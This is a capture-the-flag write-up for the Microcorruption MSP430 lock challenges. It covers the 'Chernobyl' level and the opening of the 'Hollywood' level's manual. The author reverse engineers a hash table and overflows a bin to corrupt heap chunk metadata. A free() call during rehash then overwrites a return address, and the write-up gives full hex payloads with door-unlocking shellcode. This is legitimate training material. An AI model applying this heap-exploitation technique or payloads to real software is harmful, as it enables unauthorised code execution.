tyleroar/CTF/microcorruption/README.md

 ### Level 16 / Chernobyl (Hardware revision D, Software 02)
 Looking back through my notes I see that hardware revision D software 01 was Algiers, which was the heap exploitation level.
 Looking through the program very quickly I see that it has walk/run/get_from_table/hash/rehash/get_from_table/create_hash_table/malloc/free functions...this looks like writing past a malloc'd buffer is going to be a little harder this time!
+When you run the program, you get prompted "Welcome to the lock controller.
+You can open the door by entering 'access [your name] [pin]'"
+The main() function in the program is run()
+It starts off by calling create_hash_table(3,5) and then getting 0x550 bytes of input.
+Next there's a comparison of our input to 'a', if it doesn't match, it goes down to a comparison to 'n', if that doesn't match the program exits.
+Looking down past the comparison for a, i see a comparison for ';' and a blank space.
+Based on the strings in the program, it looks like I can add in user accounts.
+I type add user 1234 and it responds with 'adding user account user with pin 04d2'!
+I then enter access user 1234 and it says 'Access granted; but account not activated'.
+Boo.
+ Presumably we're going to need to take advantage of a free() after a heap overflow, so I wonder when free() gets called (when a user is deleted or during a hash table resize?).
+ I'm probably going to need to understand the create_hash_table function a little better create_hash_table(numBins, binSize) //creates numBins of size 2^(binSize+1).
+  The hash() function hashes the username...this is what is being used as the key to our hashtable.
+What happens when we try to insert multiple values that have the same hash? create_hash_table creates a hash_table structure that is 0xa bytes.
+DWORD *ht = malloc(0xa).
+What are the fields in this structure?
+During initialization, we see it set ht[0] = 0, ht[1] = arg1 ht[2] = arg2 ht[3] = malloc(2^(arg1+1))  ht[4] = malloc(2^(arg1+1)).
+This ht struct is stored at 0x5006 in our case
+  Immediately after create_hash_table is called, ht[3] and ht[4] point to 5016 and 50c2.
+5016 looks like possibly a malloc'd chunk w/ header, and 50c2 is all 0'd out.
+  Typically heap exploits rely on free() being called on a corrupted block, so I looked through and saw that only rehash() called free..looks like i'll need to know how to trigger rehash()
+  Examining ht[0] while adding users, ht[0] looksl ike a counter for the # of values stored.
+  I wrote a quick program that generated a lot of users with the same hash, I found that I could enter 21 usernames, but when I entered a 22nd username i got a heap exhausted; aborting error.
+I also noticed that ht[1] counter went down to 0 after the 22nd username was entered.
+What exactly is causing the heap exhausted error?
+  I set a break at rehash, and saw that 12 entries had been added before rehash was called for the first time and 21 the second time.
+Also, the ht[1] (which i had throught was hard-coded to 3) changed from 3 to 4.
+  I set bp's on each of the 3 free() calls in rehash() and ran with my 22 usernames with identical hashes.
+The first rehash call (0xb entries) resulted in a free(*r10) call, where r10=5016 and *r10 = 5042.  ht[3] was 5016 at the rehash() function start, but ht[3] was 5342 at the time of the call, so the ht[3] parameter is used presumably a pointer to a linked list that rehash updates?
+    During the second reshash() call i get the heap exhaused call in malloc() after the call at 0x493e.
+   Looking at ht[3] in rehash(), I can see that it looks like an array of size 10 of pointers.
+   The rehash() function is called from add_to_table().  rehash() gets called if ht[0] >=10.

+   add_to_table(pin,username,ht)
+     add_to_table() calls rehash if ht[0] >=10?
+     increments ht[0], calls hash(username)
+     offset=hash(username)&7//?
+     r15=ht[4]
+		 r14=r15[offset]
+		 r11=ht[3]
+		 r11=ht[3]+8
+the create_hash_table(3,5) is setting up a hashtable with an initial size (3) that can grow, but a fixed number of entries per bin (5).
+The bin a user is placed in is based on it's hash.
+If we can put more than 5 users in a bin, then we can start overwriting malloc'd chunks metadata.
+If we then add in more users than the size of the table, we can trigger a rehash() which will cause free() to be called.
+If we control the chunk metadata when free() is called, we have arbitrary code execution. ht[3] is an array of pointers to our chain while ht[4] is an array of cells in each of the chains With this information, I set a break in add_to_table and started tracking where in the heap my values were being added.
+I think I want to go in the second to last bucket, so I can overflow into the metadata of the next bucket, otherwise i'll just be overflowing to uninit'd data.
+When free() is called from rehash() at 499e, the ret addr is stored in 0x3dce.
+	 So, when we overwrite the the metadata of the next bucket, we'll overwrite that retAddr w/ our shellcode, just like in algiers.
+This wasn't working for me...I'd have the chunk data set up the way I wanted, but by the time free() was called on that chunk, the values had changed.
+I think this means i want to put my values in the first chunk and overwrite the second chunk so nothign has had time to mess up the values.
+	 To put stuff in the first bucket, I can use anything that hash()%7 is 0, so I just picked ascii values that ended in 0 or 8. new ( A;new 0 A;new 8 A;new @ A;new H A
+	 there's going to be a malloc() call before my free.
+If i mess up the chunk's forward pointer, i'll get the heap exhaustion error message.
+Can I have arbitrary write with only modifying the previous pointer for the chunk?
+Yes!
+Just need to modify the prevPtr and size values to return to my input
+6e6577202820413b6e6577203020413b6e6577203820413b6e6577204020413b6e6577204820413b6e657720CA3DDC52bdf4203b6e6577204264656520613b6e6577204264664620613b6e6577204265466520613b6e6577204265474620613b6e6577204345656520613b6e657720434566463b41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414160606060606060606060

+Working input that brings me to 0x3e64, which is my A's input!
+Now i just need to convert my string of A's to shellcode that will open the door.
+6e6577202820413b6e6577203020413b6e6577203820413b6e6577204020413b6e6577204820413b6e657720CA3DDC52bdf4203b #add in the users/overwrite the next blocks prevPtr and set size so it'll overwrite retAddr with the addr of my shellcode
+6e6577204264656520613b6e6577204264664620613b6e6577204265466520613b6e6577204265474620613b6e6577204345656520613b6e65772043456646 #add in users to trigger rehash()
+3b41414141324000ffb0121000 #shellcode to trigger the door unlock final input:
+6e6577202820413b6e6577203020413b6e6577203820413b6e6577204020413b6e6577204820413b6e657720CA3DDC52bdf4203b6e6577204264656520613b6e6577204264664620613b6e6577204265466520613b6e6577204265474620613b6e6577204345656520613b6e657720434566463b41414141324000ffb0121000

+### Level 17 / Hollywood
+Lockitall                                            LOCKIT PRO r a.04
+______________________________________________________________________

+              User Manual: Lockitall LockIT Pro, rev a.04
+______________________________________________________________________

+OVERVIEW

+    - New randomization improves code security.
+    - This lock is not attached to any hardware security module.

+DETAILS

+    The LockIT Pro a.04  is the first of a new series  of locks.
+It is controlled by a  MSP430 microcontroller, and is  the most advanced MCU-controlled lock available on the  market.
+The MSP430 is a very low-power device which allows the LockIT  Pro to run in almost any environment.

+    The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to communiciate with the  LockIT Pro App, allowing the  LockIT Pro to be inaccessable from the exterior of the building.

+    There is  no default password  on the LockIT  Pro---upon receiving the LockIT Pro, a new password must be set by connecting it to the LockIT Pro  App and  entering a password  when prompted,  and then restarting the LockIT Pro using the red button on the back.

+    This is Hardware  Version A.  It contains  the Bluetooth connector built in, and one available port  to which the LockIT Pro Deadbolt should be connected.

+    This is Software  Revision 04.
+Our developers have  included a new hardware  random number  generator, making  it impossible  to know where the password  will be.
+We apologize again for  making it too easy  for the  password to  be recovered.
+Those responsible  for sacking the engineers who were previously sacked have been sacked.